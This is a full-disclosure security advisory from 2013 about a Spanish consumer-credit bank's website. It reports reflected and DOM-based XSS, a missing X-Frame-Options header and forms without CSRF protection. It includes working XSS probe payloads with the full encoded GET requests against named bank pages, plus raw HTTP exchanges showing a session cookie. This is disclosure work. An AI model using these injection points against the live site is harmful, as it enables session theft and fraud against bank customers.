CETELEM ON LINE BANK DOM-Based XSS / Clickjacking: X-Frame-Options header missing / CSRF
TIME-LINE VULNERABILITY
Multiples Advisories but Vendor not response
25-31 / 08 / 2013 Not Response ( Summer Time? )
3-09-2013 Full Disclosure
I. VULNERABILITY
-------------------------
#Title: CETELEM ON LINE BANK DOM Based Cross Site Scripting ( and DOM Based XSS ) / Clickjacking: X-Frame-Options header missing / HTML form without CSRF protection
#Vendor:httpS://www.cetelem.es/
#Author:Juan Carlos García (@secnight)
#Follow US @habemuscurso
Twitter:@secnight
II. DESCRIPTION
-------------------------
Cetelem is a bank specializing in consumer lending (consumer credit, online credit and cards).
Cetelem's main activity is the selling point funding, which accounts for 66.5% of its activity,
which has more than 2,800 stores and more than 1,000 partners car dealers.
The granting of credit cards, which represents 26% of its activity and now has about 500,000 active cards.
The one major brands of BNP Paribas Personal Finance are:
Cetelem (Argentina, Spain, France, Hungary, Portugal, Czech Republic, Romania, Russia, Slovakia)
III. PROOF OF CONCEPT
-------------------------
Cross site scripting
*********************
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be
trusted or not, it will execute the script in the user context allowing the attacker to access any cookies
or session tokens retained by the browser.
Affected items
/banco/creditos/unificacion-credito.jsp (2)
"
URL encoded GET input hidAcuerdo was set to BCO_CONSO" onmouseover=prompt(999458) bad="
The input is reflected inside a tag parameter between double quotes.
GET /banco/creditos/unificacion-credito.jsp?hidAcuerdo=BCO_CONSO%22%20onmouseover%3dprompt%28999458%29%20bad%3d%22&loadParam=false
Variant
URL encoded GET input hidAcuerdo was set to BCO_CONSO" onmouseover=prompt(999458) bad="
LoadParam
URL encoded GET input loadParam was set to false_930312():;922135
The input is reflected inside <script> tag.
GET /banco/creditos/unificacion-credito.jsp?hidAcuerdo=BCO_CONSO&loadParam=false_930312%28%29%3a%3b922135
DOM-based Cross-Site Scripting
******************************
Attack details
This vulnerability affects
/banco/empresa/contacto.jsp.
Script code from document.location path part was executed via document.write() or document.writeln() function.
The code was executed in:
https://www.ntrsupport.com/inquiero/web/an/ann4.asp?login=I23ECF50CC6BF1A9D700B43&lang=es&bgcolor=F5F3EE&txtcolor=009966&button=contacte_cetelem_new&ref=esta llamada viene desde el contacte de Cetelem.es&cat=SAC&cob=1
/onlineCetelem/FcControlador.srvl.
Script code from document.location path part was executed via document.write() or document.writeln() function.
The code was executed in: https://www.ntrsupport.com/inquiero/web/an/ann4.asp?login=I23ECF50CC6BF1A9D700B43&lang=es&bgcolor=F5F3EE&txtcolor=009966&button=ayuda_zc&cat=direct&ref=esta llamada viene desde la calculadora&cob=1
Clickjacking: X-Frame-Options header missing
*********************************************
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of
tricking a Web user into clicking on something different from what the user perceives they are clicking on,
thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjacking attack.
The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page
in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.
This vulnerability affects Web Server.
Request
GET / HTTP/1.1
Cookie: JSESSIONID=NbSfSlsWg6fYKt41d6ZSRhLWMZYdfBRHq2zLyhYGn1LKV4j92JGg!1612925708; CookieCTLM=1728053888.25115.0000
Host: www.cetelem.es
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Response
HTTP/1.1 200 OK
Date: Tue, 03 Sep 2013 00:24:24 GMT
Content-Length: 196
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
HTML form without CSRF protection
********************************
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF,
is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
Affected items
/banco/bancodocs/js/camposAplicativo.js
/banco/creditos/calcular-tasa-endeudamiento.jsp
/banco/creditos/credito-medida.jsp
/banco/creditos/unificacion-credito.jsp (650acedeac5b1b8ff8a5bcecd8fefb28)
/banco/empresa/contacte-queja.jsp
/banco/renting/renting-form-contacto.jsp
/banco/renting/renting-formulario.jsp
/onlineCetelem/FcControlador.srvl (03d0a02bcae74455d9c1db6e3e0ebc7d)
/onlineCetelem/FcControlador.srvl (0701cfa9495bc159d8d7363dd3a16043)
/onlineCetelem/FcControlador.srvl (0b38c4486c3a40b0acaacf30ac5b2f19)
/onlineCetelem/FcControlador.srvl (9015d84e8de4ec0d46e99604a1d38094)
/onlineCetelem/FcControlador.srvl (9b46e4dc609d87508e6f1a7762f99ed5)
/onlineCetelem/FcControlador.srvl (a74fae0d1a6955158369d4baabefda8f)
/banco/bancodocs/js/camposAplicativo.js.
Form name: frm
Form action: https://www.cetelem.es/banco/bancodocs/js/camposAplicativo.js
Form method: POST
Form inputs:
hidOrigen [Hidden]
hidCod_Material [Hidden]
hidDestino [Hidden]
hidImp_Financiar_Ent [Hidden]
hidImp_Financiar_Dec [Hidden]
hidDura [Hidden]
hidProducto [Hidden]
hidModalidad_Crto [Hidden]
hidSeguro [Hidden]
hidAplicativo [Hidden]
hidAcuerdo [Hidden]
hidCodigo [Hidden]
hidDuracFija [Hidden]
hidDuraMax [Hidden]
hidDuraMin [Hidden]
hidImpFijo [Hidden]
hidImpMin [Hidden]
hidImpMax [Hidden]
hidSoloLectura [Hidden]
One Example.. ( Too Many html form wtihout..)
Request
GET /banco/bancodocs/js/camposAplicativo.js HTTP/1.1
Pragma: no-cache
Referer: http://www.cetelem.es/banco/bancodocs/js/camposAplicativo.js
HTML Response
document.write('
'); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' ');
document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' ');
document.write(' '); document.write(' '); //a continuacin se van a incluir unos nuevos campos para las ofertas que tengan algun tipo de restriccion,
estos // van a ser la duracion (minima,maxima, fija,),y el importe(minimo,maximo y fijo) document.write(' '); document.write(' ');
document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write(' '); document.write('
'); function mOvr(src) { src.style.cursor = 'hand'; } function mOut(src) { src.style.cursor = 'default'; }
//FUNCION QUE OCULTA EL ESTADO function hidestatus() { window.status='' return true } if (document.layers) document.captureEvents(Event.MOUSEOVER |
Event.MOUSEOUT) document.onmouseover=hidestatus document.onmouseout=hidestatus
The impact of this vulnerability
________________________________
An attacker may force the users of a web application to execute actions of the attacker's choosing.
A successful CSRF exploit can compromise end user data and operation in case of normal user.
If the targeted end user is the administrator account, this can compromise the entire web application.
How to fix this vulnerability
_______________________________
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.
IV. BUSINESS IMPACT
-------------------------
This type of failure Banks On line they have so many customers are extremely dangerous because they
can be a serious impact on customers. No bank can have bugs in the code. Customer trust can be affected
V SOLUTION
------------------------
Write Secure Code
VI. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Carlos García (@secnight)
VII. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.